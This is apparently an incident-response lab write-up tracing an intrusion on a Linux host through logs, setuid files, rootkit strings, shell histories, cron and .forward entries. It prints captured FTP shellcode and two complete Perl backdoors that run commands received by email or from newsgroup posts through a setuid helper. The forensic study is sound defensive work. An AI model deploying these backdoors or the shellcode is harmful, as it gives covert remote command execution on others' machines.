I)  Off-line inspection 
-----------------------

ntec81 directory mirror some directories at ntec81 at root level.
The mirror is done by ttcp and tar; hence the AC (access and status
change) time is not accurate in these directories. By the way,
the mtime (moditfy time) should be correct.

i)  cd ntec81 directory

ii) exam the log files in var/log  and find evidence to support your 
    finding in part II) Network Packet Inspection


From the var/log/messages:

shows eth0 entered promiscuous mode 

Nov  1 14:10:51 ntec81 kernel: tcpdump uses obsolete (PF_INET,SOCK_PACKET)
Nov  1 14:10:51 ntec81 kernel: device eth0 entered promiscuous mode
Nov  1 14:11:27 ntec81 kernel: device eth0 left promiscuous mode
Nov  1 14:11:27 ntec81 kernel: device eth0 entered promiscuous mode

It should be done by the tcpdump sniffering

anonymous ftp from ntec88
Nov  1 16:11:53 ntec81 ftpd[2800]: ANONYMOUS FTP LOGIN FROM ntec88 [192.168.128.88], abc

FTP attack at  Nov  2 08:50:14  from ntec94

Nov  2 08:50:14 ntec81 ftpd[4082]: ANONYMOUS FTP LOGIN FROM ntec94 [192.168.128.94], 
1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1À^^H°
LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11

Nov  2 08:54:19 ntec81 ftpd[4098]: ANONYMOUS FTP LOGIN FROM ntec94 [192.168.128.94], 
1À1Û1É°FÍ1À1ÛCÙA°?Íëk^1À1É^^AF^Df¹ÿ^A°'Í1À^^A°=Í1À1Û^^HC^B1ÉþÉ1À^^H°
LÍþÉuó1ÀF^I^^H°=Íþ^N°0þÈF^D1ÀF^Gv^HF^LóN^HV^L°^KÍ1À1Û°^AÍèÿÿÿ0bin0sh1..11


iii) Find any suspicious file and recent updated files 

        e.g

         find etc -user root -perm -4000 -print -xdev
         find etc -mtime -10 -type f -print -xdev
         find home -mtime -10 -type f -print -xdev



ntec1-20:/mnt2/local/share/forensics/ntec81> find etc -user root -perm -4000 -print -xdev
etc/.cmd01


ls -l etc/.cmd01
-rwsr-xr-x    1 root     root        12274 Oct 19  2000 etc/.cmd01*



find etc -mtime -388 -type f -print -xdev | xargs ls -ltr
-rwxr-xr-x    1 root     root         1240 Nov  1  2000 etc/rc.d/rc.local
-rw-r--r--    1 root     root          627 Nov  1  2000 etc/named.conf
-rw-r--r--    1 root     root          138 Nov  1  2000 etc/hosts
-rw-r--r--    1 root     root         3084 Nov  2  2000 etc/inetd.conf
-rw-rw-r--    1 root     ftp         12288 Nov  2  2000 etc/psdevtab
-rw----r--    1 root     root          510 Nov  2  2000 etc/gshadow-
-rw----r--    1 root     root          640 Nov  2  2000 etc/group-
-r-----r--    1 root     root         1324 Nov  2  2000 etc/shadow-
-rw-r--r--    1 root     root         1215 Nov  2  2000 etc/passwd-
-r-----r--    1 root     root          500 Nov  2  2000 etc/gshadow
-rw-r--r--    1 root     root          625 Nov  2  2000 etc/group
-r-----r--    1 root     root         1324 Nov  2  2000 etc/shadow
-rw-r--r--    1 root     root         1215 Nov  2  2000 etc/passwd
-rwxr-xr-x    1 root     root          774 Nov  3  2000 etc/.email
-rw-r--r--    1 root     root           74 Nov  3  2000 etc/sendmail.cw
-rw-r--r--    1 root     root         4096 Nov  3  2000 etc/mail/virtusertable.db
-rw-r--r--    1 root     root         4096 Nov  3  2000 etc/mail/mailertable.db
-rw-r--r--    1 root     root         4096 Nov  3  2000 etc/mail/domaintable.db
-rw-r--r--    1 root     root        20480 Nov  3  2000 etc/mail/access.db
-rw-r--r--    1 root     root        20480 Nov  3  2000 etc/aliases.db
-rw-r--r--    1 root     root            8 Nov  3  2000 etc/ntp/drift
-rw----r--    1 root     root          512 Nov  3  2000 etc/ssh_random_seed
-rw-r--r--    1 root     root          263 Nov  3  2000 etc/mtab



find home -mtime -388 -type f -print -xdev | xargs ls -nl
-rw----r--    1 21669    21669         204 Nov  3  2000 home/user1/.Xauthority
-rw----r--    1 21669    21669         782 Nov  3  2000 home/user1/.bash_history
-rw-r--r--    1 21669    21669          24 Nov  2  2000 home/user1/.bash_logout
-rw-r--r--    1 21669    21669         230 Nov  2  2000 home/user1/.bash_profile
-rw-r--r--    1 21669    21669         124 Nov  2  2000 home/user1/.bashrc
-rwxr-xr-x    1 21669    21669         333 Nov  2  2000 home/user1/.emacs
-rw-r--r--    1 21669    21669          15 Nov  3  2000 home/user1/.forward
-rw-r--r--    1 21669    21669         235 Nov  2  2000 home/user1/.kde/share/config/desktop0rc
-rw-r--r--    1 21669    21669         116 Nov  2  2000 home/user1/.kde/share/config/kcmdisplayrc
-rw-r--r--    1 21669    21669         277 Nov  2  2000 home/user1/.kde/share/config/kdehelprc.1
-rw-r--r--    1 21669    21669         160 Nov  2  2000 home/user1/.kde/share/config/kfmrc
-rw-r--r--    1 21669    21669         686 Nov  2  2000 home/user1/.kde/share/config/kpanelrc
-rw-r--r--    1 21669    21669         435 Nov  2  2000 home/user1/.kderc
-rwxr-xr-x    1 21669    21669         870 Nov  3  2000 home/user1/.newr
-rw-r--r--    1 21669    21669        3394 Nov  2  2000 home/user1/.screenrc


iv) Find any trojan rootkit
        - From this rootkit program, try to find out the hidden directory
        e.g  strings ls

strings ls

%s - %s
/usr/lib/.abcd/.1file
//DIRED//


The hidden directory should be /usr/lib/.abcd


v) Exam root and user history file to support your findings in
   part II) Network Packet Inspection


the root/.bash_history shows

cd /usr/lib
ls .abcd
cd .abcd
ls
more .1add
cd /u
cd /usr/lib
cd .src
cd .abcd
cat .1addr
echo "2 192.168.128.94" >> .1addr
 cat .1addr
netstat 
ps -ef

Hence the hacker host should be 192.168.128.94



passwd user3
exit
cd /usr/lib/.abcd
ls
cat system
cat system
cat system

..
adduser usera
/usr/sbin/adduser usera
passwd usera

The backdoor user account should be user3,usera and the sniffer data should be /usr/lib/.abcd/system


scp ntec25:/etc/.cmd01 .
scp -p ntec25:/etc/.cmd01 .
ls -l .cmd01

cat .1file
echo .cmd01 >> .1file
ls -l /etc/.cmd01


scp -p ntec25:/etc/.newr .
cd /usr/lib/.abcd
ls
cat .1file
echo .newr >> .1file
cat .1file

Get the hacker tool .cmd01 and .newr from ntec25
Hide these files in .1file too.

vi) Exam user .forward and cron job (var/spool/cron) to support your 
    finding in part II) Network Packet Inspection


find . -name ".forward" -print
./user1/.forward

ntec1-20:/mnt2/local/share/forensics/ntec81/home/user1> more .forward
"|/etc/.email"

 more ../../etc/.email
#!/usr/bin/perl

$header=1;
$doit=0;
$saveit=0;

while(<>)
{
 push (@gbuffer,$_);

 if ($_ eq "\n") {$header =0;}

 if ($header && /^Subject:/ && /doooit/)
 {$doit=1;} 

 if ($header && /^Subject:/ && /saveeeit/)
 {$saveit=1;}
 
 if (!$header) 
 {
   if ($_)
   {
   #  `/etc/.cmd01 $_`;
   push (@buffer,$_);
   } 

  }
}

if ($doit || $saveit)
{
open (FILE,">/tmp/e.$$");

print FILE @buffer;

close(FILE);

if ($doit)
{
@cmd_buffer=`/usr/bin/mmencode -u /tmp/e.$$`;

  foreach $cmd (@cmd_buffer)
  {
    #print $cmd;
    if ($cmd =~ /newr/) {`$cmd`;} else
    {`/etc/.cmd01 $cmd`;}
   }

 } 

if ($saveit) {`/usr/bin/mmencode -u /tmp/e.$$ > /tmp/.sfile`;}
 
unlink ("/tmp/e.$$");

} else

{ 
 open(FILE, ">>/var/spool/mail/user1");
 print FILE @gbuffer;
 close(FILE);
}


in var/spool/cron/user1

more user1
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.5539 installed on Thu Nov  2 22:15:43 2000)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/15 * * * * /etc/.newr cuhk.erg.test testting

more etc/.newr

#!/usr/bin/perl

use News::NNTPClient;


$outfile="/tmp/n.$$";

$c = new News::NNTPClient("news.erg.cuhk.edu.hk");

#foreach  ($c->newnews($ARGV[0],time() - 3600))

($first, $last) = ($c->group($ARGV[0]));


for (; $first <= $last; $first++)

{

$subject_ln = ($c->xhdr("Subject",$first))[0];

#print "$subject_ln\n";

if ($subject_ln =~ /$ARGV[1]/)
{ 

  $s_no =(split(/\s+/,$subject_ln))[2];

  $p_no=`/bin/cat /tmp/.1file`;

  chop($p_no);
  #print "==> $p_no, $s_no\n";

  if ($p_no >= $s_no) {next;}


  open (FILE,">/tmp/.1file");
  print FILE "$s_no\n";   
  close (FILE);

  #print "==> $s_no\n";

  open (FILE,">$outfile");

  print FILE  $c->body($first); 

  close(FILE);
 
  @cmd_buffer = `/usr/bin/mmencode -u $outfile`;

  foreach $cmd (@cmd_buffer)
  { 
    #print $cmd;
    `/etc/.cmd01 $cmd`;
   }
   
  unlink($outfile);

}
}